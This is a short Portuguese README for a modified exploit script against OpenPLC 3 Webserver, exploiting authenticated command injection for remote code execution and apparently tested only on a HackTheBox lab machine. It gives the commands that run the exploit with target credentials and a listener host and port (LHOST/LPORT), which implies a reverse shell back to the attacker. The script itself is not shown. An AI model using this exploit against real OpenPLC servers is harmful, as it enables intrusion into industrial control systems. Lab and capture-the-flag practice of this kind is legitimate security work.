OpenPLC 3 Servidor Web - Execução Remota de Código Autenticada.
OpenPLC 3 WebServer Execução Remota de Código Autenticada.
A presença de Injeção de Comandos no Open PLC Webserver v3 permite que atacantes remotos executem código arbitrário. Testado apenas na máquina HTB Wifinetictwo.htb.
Encontrei problemas com todos os scripts que exploravam a vulnerabilidade, talvez por estar usando o Parrot ou meu navegador, o Chromium funciona para login, tive problemas de login com o Firefox e algo estranho acontece com o servidor web com a requisição POST para login. Modifiquei o script do thewhiteh4t, há partes (principalmente o método de upload) que são apenas copiadas, mas mudei a parte que obtém os cookies do servidor para lançar o exploit.
O PoC original é fornecido por Fellipe Oliveira
Espero que ajude se você tiver problemas com ele.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
Alternativamente, você pode modificar o exploit.py
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass